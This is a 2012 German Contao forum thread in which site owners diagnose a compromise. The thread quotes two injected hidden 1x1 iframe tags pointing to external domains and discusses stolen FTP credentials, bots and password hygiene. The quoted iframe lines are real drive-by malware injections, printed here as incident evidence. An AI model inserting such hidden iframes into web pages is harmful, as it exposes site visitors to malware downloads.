Ergebnis 1 bis 32 von 32

Thema: Seite gehackt?

  1. #1
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard Seite gehackt?

    Hallo, wir entwickeln gerade eine mobile Webseite.
    Hoster ist 1und1. Plötzlich taucht im Code ganz oben die Zeile auf:
    <iframe src=http://computek-ncl.com/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><!DOCTYPE html>

    Die Seite wird z.B. im Firefox normal geladen. Am iPhone rutscht
    die Seite jedoch nach unten und oben läd der 404-IFrame. Im Log findet sich
    folgende Fehlermeldung:

    Details: No active page for page ID...
    Browser: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A405 Safari/7534.48.3

    Jemand eine Idee?
    Vielen Dank

  2. #2
    Contao-Urgestein Avatar von Thomas
    Registriert seit
    16.08.2009.
    Ort
    Visselhövede
    Beiträge
    1.947
    User beschenken
    Wunschliste

    Standard

    Ich würde das mal in den Logs kontrollieren!
    Normal ist das definitiv nicht.
    Gruß Thomas
    "Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du." Mahatma Gandhi

  3. #3
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    Danke. Firebug zeigt mir, wenn ich den Quelltext ausgeben will, zwei Frames an.

    1. Den normalen Link
    2. Das iFrame http://computek-ncl.com/stata.html

    Ich denke also nicht, dass das CMS gehackt wurde.
    Was denkt ihr?

  4. #4
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    okay, ich habe den fehler gefunden.
    in der index.php war ganz oben die iframe-zeile eingefügt. how comes?
    ich hab sie jetzt einfach rausgelöscht. was kann das sein, was würdet
    ihr empfehlen?

  5. #5
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.755
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Frag erstmal bei 1&1 nach, ob die da eventuell bei deinem Tarif automatisch Banner o.ä. einblenden bzw. ob ihnen der Code etwas sagt. Wenn nicht, dann bitte sie darum, dass die Techniker nachschauen ob sie sehen können wie/wann der Code da reinkam.

    Welche Contao-Version nutzt du?

  6. #6
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    Version ist 2.10.3

    Ich habe gerade mit 1und1 telefoniert.
    Der Mitarbeit hat mir gesagt, dass die Dateien
    "cron.php" und "share.php" am 30.1 um 3:19 angepackt wurden.
    Ist dahin gehend irgendwas bekannt?
    Wie soll ich weiter verfahren?


    edit: auch bei den beiden dateien war die iframe-zeile eingefügt.
    hab sie entfernt
    Geändert von Korbi_et_orbi (01.02.2012 um 14:39 Uhr)

  7. #7
    Contao-Fan Avatar von Russe
    Registriert seit
    23.10.2009.
    Beiträge
    729

    Standard

    Das sieht dann schon danach aus dass da jemand Zugriff auf eure Dateien hat, dann heißt es alles überprüfen ob noch andere Dateien geändert wurden, für alle Zugänge die in Frage kommen die Passwörter ändern (Contao, FTP, Hosting etc.).
    Russe

  8. #8
    AG CMS-Garden
    Contao-Urgestein
    Avatar von lindesbs
    Registriert seit
    05.06.2009.
    Ort
    Oer-Erkenschwick
    Beiträge
    4.154
    Partner-ID
    keine
    User beschenken
    Wunschliste

    Standard

    Backup machen, ContaoCheck und evt. neu aufsetzen.
    von Willi Voltz aus PR 500: Henry George sagte einmal: »Kultur ist Zusammenarbeit.«


    Contao-Hosting: begeisterter Uberspace-Nutzer

  9. #9
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.755
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Zitat Zitat von Korbi_et_orbi Beitrag anzeigen
    Version ist 2.10.3

    Ich habe gerade mit 1und1 telefoniert.
    Der Mitarbeit hat mir gesagt, dass die Dateien
    "cron.php" und "share.php" am 30.1 um 3:19 angepackt wurden.
    Ist dahin gehend irgendwas bekannt?
    Wie soll ich weiter verfahren?
    Ich vermute mal, dass an diesem Tag um diese Zeit alle PCs auf denen die Zugangsdaten existieren ausgeschaltet waren? Hat der Mitarbeiter von 1&1 auch gesagt von welcher IP aus das geschah? Immerhin handelt es sich hier offensichtlich um einen Hack - da müssten die doch daran interessiert sein, herauszufinden wie das passiert ist und wer es war. Wenn das also erst vor so kurzer Zeit passierte, kann man ja im ersten Schritt anhand der IP vielleicht herausfinden aus welchem Land die Person X kam. Im zweiten Schritt könnte man in Abstimmung mit 1&1 Anzeige erstatten. Dafür müsste aber 1&1 die entsprechenden Logdaten und etwaige sonst notwendige Daten sichern.

    Welches FTP-Programm nutzt du denn und welche Version davon?
    Hast du den PC über den die Seite normalerweise gepflegt wird schon komplett auf Viren, Keylogger, etc. gecheckt?

  10. #10
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    1und1 geht von einer sicherheitslücke bei contao aus. ich arbeite mit filezilla und osx. kann mir nicht vorstellen, dass der angriff hiervon ausging. werd nochmal nachhaken.

  11. #11
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.755
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Der Webhoster geht immer davon aus, dass es jemand anders war. Man zeigt ja ungern mit dem Finger auf die eigene Technik. Aber davon unabhängig geht es ja auch darum nicht nur das "wie" herauszufinden, sondern im Idealfall das "wer". Daher meine IP-Frage.

    Falls das insgesamt falsch rüber gekommen sein sollte: Wir nehmen deine Meldung absolut ernst und schauen natürlich auch ob wir ein mögliches Problem bei Contao finden.
    Momentan wäre da aber nichts bekannt für diese Version.

    Kannst du bitte noch sagen welche Erweiterungen (Versionen) in deiner Contao-Installation installiert sind?

  12. #12
    AG CMS-Garden
    Contao-Urgestein
    Avatar von lindesbs
    Registriert seit
    05.06.2009.
    Ort
    Oer-Erkenschwick
    Beiträge
    4.154
    Partner-ID
    keine
    User beschenken
    Wunschliste

    Standard

    und bitte mit dem ContaoCheck kontrollieren, was alles veraendert wurde : http://www.contao.org/de/configuring...l#contao-check
    Die richtige Verison raussuchen, und testen.
    von Willi Voltz aus PR 500: Henry George sagte einmal: »Kultur ist Zusammenarbeit.«


    Contao-Hosting: begeisterter Uberspace-Nutzer

  13. #13
    Contao-Fan Avatar von markocupic
    Registriert seit
    06.12.2010.
    Ort
    Oberkirch (Schweiz)
    Beiträge
    660

    Standard

    ist mir auch schon passiert. Bei mir lag es am zu schwachen ftp-Passwort.
    Passwort ersetzen und Problem war behoben.
    Gruss Marko
    Anfragen für bezahlten Support oder Extension-Programmierung via PN.

  14. #14
    Contao-Urgestein Avatar von Thomas
    Registriert seit
    16.08.2009.
    Ort
    Visselhövede
    Beiträge
    1.947
    User beschenken
    Wunschliste

    Standard

    Damit machst Du Dir das dennoch zu einfach!

    Was ist, wenn das bei ihm nicht der Fall ist?

    Sorry, aber da kann ich dann doch nur den Kopf schütteln.

    Wenn ich Nachforschungen betreibe, dann richtig.
    Und die Aussage, dass das von Contao kommt, sollen die erst mal an Fakten beweisen.
    Dazu gehört nun mal Recherche und nicht nur ein 1. Level Support, der nur telefonieren kann. ^^
    Bei dieser Antwort von 1und1 geht mir die Hutkrempe mal wieder hoch und spiegelt die einhellige Meinung über den Support und die Behandlung von Kunden wieder.

    Nachforschungen anstellen, Fehler beheben, Lücken schließen, anderen Server oder Webspace mieten, Seite umziehen und zu guter Letzt 1und1 kündigen.
    Ich finde das eine Frechheit.

    Vorschläge für gute Firmen gibt es hier im Forum zu genüge.
    Gruß Thomas
    "Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du." Mahatma Gandhi

  15. #15
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    erstmal vielen dank für eure antworten.
    das wichtigste: der iframe taucht auch an tag 2 nicht mehr auf.
    ich stell mir nach wie vor die sinnfrage. warum bettet jemand
    sowas ein? wollen sie traffic auf ihre seite kriegen?

    passwörter ändern ist natürlich die wichtigste sofortmaßnahme.

    ich werde beide seiten- contao und 1und1 -noch einmal kontaktieren
    und mit den wichtigsten infos versorgen, damit eine vielleicht bestehende
    lücke geschlossen werden kann.

  16. #16
    AG CMS-Garden
    Contao-Urgestein
    Avatar von lindesbs
    Registriert seit
    05.06.2009.
    Ort
    Oer-Erkenschwick
    Beiträge
    4.154
    Partner-ID
    keine
    User beschenken
    Wunschliste

    Standard

    Hast du denn mittlerweile mal den ContaoCheck gemacht ?
    Damit du wirklich sicherstellen kannst, das am Core nicht noch was angepasst wurde ?


    Und warum macht man sowas ?
    Weil durch einfach eratbare FTP Passwoerter eben Spielkinder sich beschaeftigen koennen.

    Auf meinem Server werden solche Speilkinder nach wenigen Versuchen geblockt, und ich ahb etliche am Tag, die Passowerter durchprobieren.
    von Willi Voltz aus PR 500: Henry George sagte einmal: »Kultur ist Zusammenarbeit.«


    Contao-Hosting: begeisterter Uberspace-Nutzer

  17. #17
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    hab den check gerade gemacht.
    es gibt seitenweise fehlermeldungen.
    ich hab einen auszug davon mal angehängt:
    Bildschirmfoto 2012-02-02 um 15.11.08.png

    auf was muss ich genau achten?

  18. #18
    Contao-Fan
    Registriert seit
    20.06.2009.
    Ort
    Berlin
    Beiträge
    418

    Standard

    Hallo,

    das IFrame Problem kenne ich auch von einer Contao 2.9x Installtion. Vor Kurzem wurde dort folgendes IFrame eingeschmuggelt:

    <iframe src=http://marcodenicolais.it/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

    Betroffen sind sowohl die Frontend-Seiten (die aber noch richtig geladen werden), als auch das Backend. Das Backend lässt kein Login mehr zu, da nur das IFrame aber nicht mehr die Login-Maske geladen wird.

    Der Hoster ist All-Inkl. Es ist also nicht von einem Hoster abhängig.

    Die Passwörter waren verschieden und bestanden aus gemischten Buchstaben/Zahlenkombinationen, ein Ratespiel der Passwörter kommt daher eigentlich nicht in Frage.

    Gruß

    Stefan

    Ergänzung:

    Das Backend war bei dieser Installtion nicht mit einem Verzeichnisschutz versehen!

  19. #19
    Community-Moderator Avatar von schman
    Registriert seit
    19.06.2009.
    Ort
    Dornbirn
    Beiträge
    3.739
    User beschenken
    Wunschliste

    Standard

    Zitat Zitat von AgentK Beitrag anzeigen
    Die Passwörter waren verschieden und bestanden aus gemischten Buchstaben/Zahlenkombinationen, ein Ratespiel der Passwörter kommt daher eigentlich nicht in Frage.
    Dann kommt immer noch ein Keylogger in Frage.
    Kein Privat Support via PM.

  20. #20
    Contao-Fan
    Registriert seit
    20.06.2009.
    Ort
    Berlin
    Beiträge
    418

    Standard

    hmmm.... das kann ich jetzt nicht ausschließen aber es betrifft nur einen Account. In anderen Accounts wurden keine Veränderungen vorgenommen.

  21. #21
    Contao-Urgestein
    Registriert seit
    07.07.2009.
    Beiträge
    4.107

    Standard

    Das im Frontend über Contao iFrames eingeschmuggelt werden können ist denkbar. Aber im Backend?? Nein Leute, das kann kein Contao Problem sein, das CMS ist gekapselt. Da muss sich jemand Zugang zu den Webhosting Daten verschafft haben!

  22. #22
    Contao-Nutzer
    Registriert seit
    19.08.2011.
    Beiträge
    65

    Standard

    bei mir war nur das Frontend betroffen.

  23. #23
    Contao-Nutzer
    Registriert seit
    01.02.2012.
    Beiträge
    8

    Fehler Bot?

    Hi,

    mir ist eine ähnliche Situation auch untergekommen, allerdings nicht mit Contao.

    Bei mir war es ein Bot der sich über einen SSH-Account (mit richtigen Zugangsdaten) eingeloggt hat und die Dateien manipuliert hat. Dieser Bot hat in regelmäßigen Abständen die Dateien überprüft und ggf. die Frames neu hinzugefügt. Die Zugriffe kamen alle von der selben IP, sodass man das leicht in den Logs nachvollziehen konnte.
    Nachdem das Passwort geändert wurde, hat der Bot immer wieder versucht sich einzuloggen, bis ich ihn ausgesperrt hab . Danach hatte ich keine Probleme mehr.

    Interessant war auch das die IP des Bots in einer Blacklist für Botnetze gelistet war.

    Mein Tipp:
    1. Passwort ändern
    2. IP des Zugriffs rausfinden & Googlen
    3. Zugriffe überwachen und ggf. IP blocken
    "Die Wissenden reden nicht, die Redenden wissen nicht." - jap. Sprichwort

  24. #24
    Contao-Nutzer
    Registriert seit
    01.02.2012.
    Beiträge
    8

    Standard

    Zitat Zitat von schman Beitrag anzeigen
    Dann kommt immer noch ein Keylogger in Frage.
    Interessant in dem Zusammenhang ist auch wo und wie die Passwörter gespeichert werden.


    mfg
    "Die Wissenden reden nicht, die Redenden wissen nicht." - jap. Sprichwort

  25. #25
    Contao-Nutzer Avatar von Gausi
    Registriert seit
    04.09.2009.
    Beiträge
    149

    Standard

    Wenn Filezilla benutzt wird, könnte es auch sein, dass die Zugangsdaten von einem Trojaner aus dem Configfile ausgelesen wurden. Die stehen da nämlich im Klartext drin.

    Zu dem Sinn hinter solchen Aktionen: Ist das einfach nur ein iFrame mit harmlosen html-Code, oder steckt da noch ein bösartiges Script drin? Wenn deine Seite dann anfängt, Ransomware wie den BKA-Trojaner zu verteilen, um Lösegeld zu erpressen, dann hast du den Zweck der Aktion.
    All of this has happened before - but the question remains: Does all of this have to happen again?

  26. #26
    Contao-Fan Avatar von Nils Riel
    Registriert seit
    19.06.2009.
    Beiträge
    730

    Standard

    Das gleiche Problem hatte ich auch schon bei einem Kunden. Hintergrund: Eine Sicherheitslücke in Filezilla. Jeder der Zugriff auf den FTP hatte muss nun auf jeden Fall Filezilla updaten und das Passwort eines jeden gespeicherten FTP-Servers ändern.

  27. #27
    Contao-Urgestein
    Registriert seit
    07.07.2009.
    Beiträge
    4.107

    Standard

    Wieso verwendet man überhaupt ein FTP-Programm? Und dann auch noch eins was die PW's als Klartext abspeichert?

  28. #28
    Contao-Fan
    Registriert seit
    03.10.2010.
    Beiträge
    365

    Standard

    Zitat Zitat von andreasisaak Beitrag anzeigen
    Wieso verwendet man überhaupt ein FTP-Programm? Und dann auch noch eins was die PW's als Klartext abspeichert?
    Deine Alternative zum FTP-Programm wäre genau welche?

  29. #29
    Contao-Urgestein
    Registriert seit
    07.07.2009.
    Beiträge
    4.107

    Standard

    Ein (S)FTP/SSH fähiges Programm - WinSCP.

  30. #30
    AG Core-Entwicklung Avatar von Psi
    Registriert seit
    19.06.2009.
    Ort
    Mittelfranken
    Beiträge
    930
    Partner-ID
    5583
    User beschenken
    Wunschliste

    Standard

    rsync ftw

  31. #31
    Contao-Fan
    Registriert seit
    03.10.2010.
    Beiträge
    365

    Standard

    Zitat Zitat von andreasisaak Beitrag anzeigen
    Ein (S)FTP/SSH fähiges Programm - WinSCP.
    Kann Filezilla doch

  32. #32
    Contao-Nutzer
    Registriert seit
    24.06.2009.
    Ort
    Tübingen
    Beiträge
    71

    Standard

    Hatte das gleiche Problem. Den Zugang haben sich die Burschen über den Admin-Ordner einer OS Commerce Installation auf die Root Ebene des Servers verschafft. Es wurden an alle (ca. 11000) Dateien (.html und .php) ein Javascript angehängt das dann in einen i-frame eine Domain öffnete. Diese wiederum verwies auf die nächste Domain usw. Es ging über Holland bis in die Ukraine. Ziel war es Schadsoftware auf den Rechner des Besuchers zu laden. Erkennen konnte man den Hack unter Anderem an einen leicht veränderten Seitentitel. Der Hoster war 1und1. Im Server Protokoll konnte der Zeitpunkt des Angriffs bestimmt werden und die Bitte, alle Dateien aus dem täglichen Update neu aufzuspielen wurde innerhalb 2 Stunden erfüllt.
    Gruß Max

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •